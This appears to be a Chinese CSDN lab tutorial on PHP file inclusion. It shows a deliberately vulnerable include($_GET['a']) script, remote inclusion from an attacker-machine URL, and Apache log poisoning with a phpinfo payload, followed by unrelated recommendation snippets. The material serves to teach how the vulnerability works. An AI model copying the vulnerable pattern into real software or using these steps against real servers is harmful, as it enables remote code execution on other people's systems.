文 件 包 含

已于 2022-02-28 20:28:06 修改
阅读量272 收藏
点赞数
文章标签: 网络协议 网络
于 2022-02-28 20:27:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbygadgjsad/article/details/123189574
版权

什么是文件包含?

下图很好的表达了"文件包含"的含义,图1中(a)为文件f1.c,它有一个#include “f2.c”命令,后面跟着文件内容,记为程序1.图1中(b)为另一个文件f2.c,文件内容以程序2表示。在预编译时,对要#include命令进行"文件包含"处理,将f2.c的全部内容复制插入到#include “f2.c” 命令处,即f2.c被包含到f1.c中,得到如图1中(c)所示的结果。在编译时,将"包含"以后的f1.c(如图1中(c))作为一个源文件进行编译处理。

 

文件包含:开发人员通常会把重复使用的函数写到单个文件中,使用时直接调用此文件,而无需再次编写,这种调用文件的过程一般称为包含。

一、本地文件包含(无视后缀)

创建:include.php

<?php include("print.php");?>

再创建:print.php

<?php echo "hello world";?>

再访问浏览器访问include.php

 试着去修改print.txt扩展名为:jpg、rar、xxx发现均可解析,只要文件内容符合PHP语法规范,任何扩展名都可以被PHP解析。

二、远程文件包含Getshell

首先确定自己的目标机和攻击机,这里是本机为攻击机,虚拟机为目标机。我们要先确定目标机PHPstudy上如图已经开启

 编写include.php并上传到网站根目录

<?php include($_GET['a']);?>

然后在本地网站根目录新建phpinfo.php

<?php phpinfo();?>

然后进行远程包含,打开浏览器输入

http://目标机ip/include.php?a=http://攻击机ip/phpinfo.php

 三、apache日志文件包含

找到apache安装目录下的conf里面的httpd.conf配置文件找到 CustomLog "logs/access.log" common 去掉前面的#号

 然后访问http://本机ip/<?php phpinfo();?>

再去寻找日志

 

 

 再利用Burp进行抓包

 将被编码的符号改回去

再发送后去查看日志。

访问:http://本机ip/include.php?a=E:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log

 四、php伪协议

1、php://input

2、filter://

3.data://

雲小
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php定时执行代码漏洞_常见的PHP代码执行漏洞
weixin_35812176的博客
01-14 227
1. 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:echo `dir`;?>2. 文件包含代码注射文件包含函数在特定条下的代码注射,如include()、include_once()、...
CE8.5OC中
08-15
在功能方面,Cimatron E8.5 OC中了多个关键组,这些组的DLL如CimNcProceduresRc.dll、5axui_res_neutral.dll等,都扮演着至关重要的角色: 1. CimNcProceduresRc.dll:这个可能的是...
Nginx配置SSI
手可摘星河
04-29 137
一.什么是SSISSI:ServerSideInclude,是一种基于服务端的网页制作技术,大多数(尤其是基于Unix平台)的web服务器如NetscapeEnterpriseServer等均支持SSI命令。它的工作原因是:在页面内容发送到客户端之前,使用SSI指令将本、图片或代码信息到网页中。对于在多个中重复出现内容,使用SSI是一种简便的方法,将内容存入一个...
php文件包含漏洞 file inclusion vulnerability
whyrookie的博客
09-19 513
0x00 何为文件包含漏洞 开发人员如果在写类似include "a.php"的代码时,如果将a.php写成了可变的值,那么就可以在上面做章,举个理想的例子: <? include $_GET['a'] ?> 此时可以把url中传入的合法get值篡改成非法值,include进去,这个非法值就被php解释器执行了。 一个更具体的例子: 在访问一个页面时: 此图表明可以传入名来形成文件包含效果,如果在此目录建立a.txt并填充内容,则修改page=a.txt就会显示内容,此即为...
文件包含漏洞 概述
最新发布
m0_60870041的博客
11-24 876
了解文件包含漏洞原理
PHP文件包含漏洞
Jim的博客
08-17 1269
PHP的文件包含可以直接执行的代码,格式是不受限制的。 文件包含分为本地(local file include)和远程文件包含(remote file include文件包含函数有:include(),include_once(),require()和require_once() 1.本地文件包含是指只能本机漏洞,大多出现在模块加载,模板加载和ca
分词学习版
10-11
本组全部采用ANSI标准C++开发,可广泛应用于当今的操作系统平台上,如:MS Windows、Linux及其它各公司出品的Unix操作系统。 2. 支持范围广 在MS Windows平台下,本组以COM接口的DLL格式进行封装,可支持所有...
笔记标注的谷歌中翻译
01-11
函数应保持小巧,专注于做一事。避免过长的参数列表,推荐使用默认参数和命名参数。函数命名应反映其功能,遵循一定的命名约定。 #### 来自 Google 的奇技 谷歌提出了一些特定的编程技巧,如智能指针的使用、RAII...
DevExpress 18.1 汉化
11-06
DevExpress是一款知名的.NET...总的来说,DevExpress 18.1汉化是为中国开发者和用户量身定制的工具,它使得DevExpress这一强大开发工具套更加贴近国内开发者的使用需求,降低了学习和使用成本,提升了开发效率。
SX1212开发资料,手册,封装、官方驱动程序等
04-22
SX1212是一款高性能的LoRa调制解调器,由Semtech公司设计,用于长距离、低功耗的无线通信应用。这个开发资料压缩了一系列与SX1212开发相关的资源,帮助开发者深入理解和高效使用该芯片。 ...
文件包含知识总结
qq_42570883的博客
01-08 1528
0×01 文件包含 Q:什么是文件包含? A:简单一句话,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来, 直接使用的代码。 Q:文件包含漏洞的成因是什么? A:在的时候,为了灵活,将设置为变量,通过动态变量来引入需要时, 用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞, 通常文件包含漏洞出现在PHP语言中。 文件包含漏洞的形成,简单来说,需要满足两个条: 1、用户能够控制这
网络安全——文件包含漏洞
weixin_54055099的博客
09-24 1716
文件包含漏洞的原理
文件包含漏洞
qq_50854662的博客
05-21 6679
文件包含文件包含漏洞知识总结 一、什么是文件包含漏洞? 1、文件包含概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 什么叫呢?以PHP为例,我们常常把可重复使用的函数写入到单个中,在使用该函数时,直接调用此,而无需再次编写函数,这一过程就叫做。 有时候由于网站功能需求,会让前端用户选择要,而开发人员又没有对要进行安全考虑,就导致攻击者可以通过修改的位置来让后台执行任.
详解文件包含漏洞
MachineGunJoe666
06-10 1885
file:// #访问本地系统http:// #访问HTTPs网址ftp:// #访问ftp URLphp:// #访问输入输出流zlib:// #压缩流data:// #数据expect:// #处理交互式的流glob:// #查找匹配的路径。
文件包含的本质、预处理符号、# vs ##】
qq_64446981的博客
05-25 1065
在`main`函数中,首先使用`1.1e2`的科学计数法直接输出了`110.000000`,然后使用`CONT(1.1, 2)`宏对参数进行拼接,得到了相同的结果。第一次时,`XXX`未被定义,`#ifndef` 判断为真,进入条编译块,`#define XXX` 定义符号 `XXX`,然后的内容。程序定义了一个名为`__welcome`的宏,并使用了条编译指令`#ifndef`和`#endif`来判断`__welcome`宏是否已经定义。那么,重复一定报错吗?
文件包含
jihaichen的博客
05-04 4551
1、定义文件包含漏洞是指客户端(一般为浏览器)用户通过输入控制动态在服务器的,从而导致恶意代码的执行及敏感信息泄露,主要括本地文件包含LFI和远程文件包含RFI两种形式。2、原理由于开发人员编写源码时将可重复使用的代码写入到单个的中并在需要的时候将它们在特殊的功能代码中,这样被中的代码就会被解释执行。如果没有针对代码中存在文件包含的函数入口做过滤,就会导致客户端可以提...
文件包含总结(部分)
zwish的信安之路
07-15 1081
一、文件包含是什么? 文件包含漏洞:即File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态,此时如果没有对来源进行严格审查,就会导致任意读取或者任意命令执行。 攻击...
文件包含技巧拓展】————3、文件包含漏洞(上)
Fly_鹏程万里
01-30 600
导语: 当程序员在编写代码的过程中,由于使用PHP文件包含函数过滤不严,从而导致了文件包含漏洞。在PHP中用于文件包含的函数有四个: require require_once include include_once include和require区别主要是include的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序...
我需要一段python程序:现 给 出 一 个 某 一 地 区 三 年 的 逐 月 平 均 降 水 伪 数 据 (Precip.txt),另一个为同期的表征降水的某指数(Index.txt)。 分别读取降水数据和该指数,选择每年夏季的数据(Jun,Jul,Aug),计算 三年夏季降水和该指数的Pearson相关系数(保留两位小数)。
05-25
以下是一个可能的Python程序实现: ```python import numpy as np import pandas as pd # 读取Precip.txt,假设数据格式为"年份 月份 降水量" precip_data = pd.read_csv("Precip.txt", delim_whitespace=True, header=None, names=["year", "month", "precip"]) # 计算每年夏季的总降水量 summer_precip_data = precip_data.loc[precip_data["month"].isin([6, 7, 8])].groupby("year")["precip"].sum() # 读取Index.txt,假设数据格式为"年份 指数值" index_data = pd.read_csv("Index.txt", delim_whitespace=True, header=None, names=["year", "index"]) # 将夏季降水量和指数数据合并到同一个DataFrame中 summer_data = pd.concat([summer_precip_data, index_data.set_index("year")], axis=1, join="inner") # 计算Pearson相关系数 corr_coef = np.corrcoef(summer_data["precip"], summer_data["index"])[0, 1] # 输出结果 print("Pearson相关系数为:{:.2f}".format(corr_coef)) ``` 注意,这个程序假设数据格式为纯,每行数据以空格或制表符分隔,列数为3或2。如果数据的格式有所不同,需要进行相应的修改。此外,程序还需要依赖pandas和numpy两个Python库,请确保已经安装。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值